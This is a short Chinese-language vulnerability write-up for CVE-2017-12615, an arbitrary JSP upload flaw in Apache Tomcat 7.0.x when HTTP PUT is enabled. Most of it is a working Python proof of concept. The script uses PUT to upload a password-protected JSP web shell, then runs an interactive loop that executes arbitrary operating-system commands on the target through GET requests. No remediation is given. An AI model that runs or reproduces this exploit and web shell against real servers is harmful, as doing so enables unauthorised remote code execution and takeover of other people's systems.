CVE-2017-12615 Apache Tomcat 任意代码上传漏洞

简介

• 一个web应用服务器

CVE-2017-12615

1.描述

• Apache Tomcat 7.0.0 – 7.0.81
• 启用了 HTTP PUT 请求方法（将 readonly 初始化参数由默认值设置为 false）

2.原理

• 攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件

3.POC

• poc.py
  • import requests
    ​
    url_put = “http://192.168.76.138:8080/{}.jsp/”
    url_exp = “http://192.168.76.138:8080/{}.jsp?&pwd=023&cmd={}”
    filename = str(input(“Please enter put file name:”))
    ​
    #jsp马
    data = ”'<%@ page language=”java” import=”java.util.*,java.io.*” pageEncoding=”UTF-8″%>
    <%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
    +”\\n”);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if(“023”.equals(request.getParameter(“pwd”))&&!””.equals(request.getParameter(“cmd”))){out.println(“<pre>”+excuteCmd(request.getParameter(“cmd”))+”</pre>”);}else{out.println(“:-)”);}%>”’
    ​
    ​
    res = requests.put(url=url_put.format(filename),data=data)
    ​
    if int(res.status_code) == 201:
       quit_input = True
       while quit_input:
           cmd = str(input(“CVE-2017-12615 is exist!\nplease enter cmd:”))
           if cmd in [‘q’,’quit’,’exit’]:
               quit_input = False
               continue
           res_cmd = requests.get(url=url_exp.format(filename,cmd))
           print(res_cmd.text)

4.EXP

• 利用该漏洞可以执行任意命令